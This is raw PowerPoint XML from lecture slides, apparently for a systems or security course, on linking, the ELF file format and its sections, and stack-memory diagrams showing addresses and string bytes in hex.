          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79016" y="247560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0xfd2bc</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0x80483f4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9" y="1948036"/>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59806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88098" y="23049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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="195593833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r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504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137</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79016" y="28465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0x80483f4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9" y="1948036"/>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59806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88098" y="23049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88097" y="2653366"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="192332768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r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504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138</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79016" y="28465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0x80483f5</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9" y="1948036"/>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86548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88098" y="23049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88097" y="2653366"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="144447992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0xfd2e0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r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504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139</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79016" y="28465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0x80483f5</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9" y="1948036"/>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86548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88098" y="23049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88097" y="2653366"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71436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Compilation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The linker combines the binary object with libraries, resolving references that the code has to external objects (e.g., functions) and creates the final executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GNU/Linux: The linker is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ld</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Static linking is performed at compile-time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic linking is performed at run-time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most common executable formats:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GNU/Linux: ELF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows: PE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="436281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88246"/>
          <a:ext cx="2831284" cy="48768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140</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105743" y="218445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43449" y="5110284"/>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0x80483f7</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115015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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19033380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141</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endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRP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0x80483f7</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115015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0xfd290</a:t>
            </a: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33717748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142</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endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRP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0x80483fa</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140032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52554050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143</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0x8048504</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0x80483fa</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140032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5902742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144</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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRP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0x80483fd</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170224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30425830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145</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0x8048504</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0x80483fd</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3" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="170224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303663171"/>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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</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146</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0x8048401</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19524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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203874830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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</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147</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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRP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0x8048404</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2370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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2141140636"/>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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</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148</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0x8048404</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23707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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="76719647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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</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r h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</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149</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0x8048407</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4872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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="779305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4306" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The ELF File Format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="994307" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Executable and Linkable Format (ELF) is one of the most widely-used binary object formats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ELF is architecture-independent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ELF files are of four types:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relocatable: need to be fixed by the linker before being executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Executable: ready for execution (all symbols have been resolved with the exception of those related to shared libs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shared: shared libraries with the appropriate linking information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Core: core dumps created when a program terminated with a fault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tools: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>readelf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1394405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43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43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43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430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430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430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430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943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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</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5"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</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150</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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27843920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151</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36090204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152</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1186817573"/>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153</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1014836075"/>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0xfd2d0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>340 (0x20303433)</a:t>
                      </a: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154</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103478805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0x8048423</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fall (0x6c6c6166)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>340 (0x20303433)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155</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1360199751"/>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 201 (0x31303220)</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fall (0x6c6c6166)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>340 (0x20303433)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156</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91379274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5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>ro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x6f722035)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> 201 (0x31303220)</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fall (0x6c6c6166)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>340 (0x20303433)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157</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1459055097"/>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pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x21736b63)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5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>ro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x6f722035)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> 201 (0x31303220)</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fall (0x6c6c6166)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>340 (0x20303433)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158</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="61763" y="51551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0xfd290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22325018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pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>(0x21736b63)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5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>ro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x6f722035)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> 201 (0x31303220)</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fall (0x6c6c6166)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>340 (0x20303433)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159</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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213496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511944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8404" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Typical ELF Sections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="998457" name="Group 57"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph type="tbl" idx="1"/>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="228600" y="2171701"/>
          <a:ext cx="8686800" cy="3123725"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2171700">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2171700">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2171700">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2171700">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="3429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bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>Name</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bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>Description</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bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>Type</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bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>Flags</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r h="5715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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>.text</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the program’s code</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PROGBITS</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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>ALLOC and EXECINSTR</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257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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>.data</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initialized data</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PROGBITS</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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>ALLOC and WRITE</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036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.rodata</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read-only data</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PROGBITS</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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
